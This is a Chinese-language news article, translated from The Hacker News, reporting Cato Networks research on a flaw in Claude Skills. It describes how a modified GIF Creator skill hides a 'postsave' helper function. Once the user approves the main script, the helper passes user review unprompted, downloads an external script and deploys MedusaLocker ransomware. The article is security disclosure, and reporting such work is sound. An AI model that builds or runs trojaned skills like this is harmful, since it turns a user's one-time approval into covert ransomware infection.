HackerNews 编译，转载请注明出处： Anthropic 公司旗下 AI 产品 Claude 的新增功能 “Claude Skills” 被发现存在勒索软件攻击风险 —— 该功能可被黑客操控，在用户未明确察觉的情况下部署 MedusaLocker 等恶意软件。 Claude Skills 的设计初衷是通过自定义代码模块扩展 AI 功能，但这类看似合法的技能却成为威胁行为者的欺骗性危险工具。 漏洞核心：单一授权信任模型缺陷 问题根源在于 Claude Skills 的 “单一授权信任模型”：用户一旦授予某个技能初始运行权限，该技能即可在后台执行一系列操作，包括下载并运行额外的恶意代码。 卡托网络（Cato Networks）的安全分析师 / 研究员指出，这一设计存在重大安全漏洞。考虑到 Anthropic 庞大的用户基数，通过公共代码仓库或社交媒体传播的看似无害的技能，可能成为发动破坏性勒索软件攻击的 “特洛伊木马”，潜在影响大量用户。 此类攻击的危害不容小觑：企业员工若安装恶意 Claude Skill，可能无意中引发全公司范围的勒索软件事件。攻击者正是利用了用户对 AI 功能的信任，将提升生产力的工具转化为安全噩梦。 此外，合法技能可被轻易修改以植入恶意载荷，这使得该威胁具备大规模扩散的潜力。 攻击感染路径 卡托网络威胁研究实验室（Cato CTRL）的研究员通过修改官方开源 “GIF 创建器”（GIF Creator）技能，演示了完整的感染流程，其过程隐蔽且高效： 植入恶意辅助函数：研究员在技能中添加了一个名为postsave的辅助函数，表面上是 GIF 创建工作流的无害组成部分，声称用于对生成的 GIF 进行后处理； 规避用户审查：Claude 仅会提示用户批准主脚本的运行，不会对辅助函数的隐藏操作进行二次确认，因此该恶意函数可绕过用户检查； 静默执行恶意行为：用户授予初始权限后，恶意辅助函数无需进一步提示或警告即可运行，其真实目的是秘密下载并执行外部脚本； 部署勒索软件：最终通过该脚本下载并运行 MedusaLocker  勒索软件，对用户文件进行加密。 执行流程显示，用户首次授权后，隐藏的子进程会继承 “可信状态”，从而在不被察觉的情况下实施恶意行为。这一关键漏洞意味着，攻击者可借助合法 AI 工具的伪装，利用用户的初始授权发起完整的勒索软件攻击。   消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文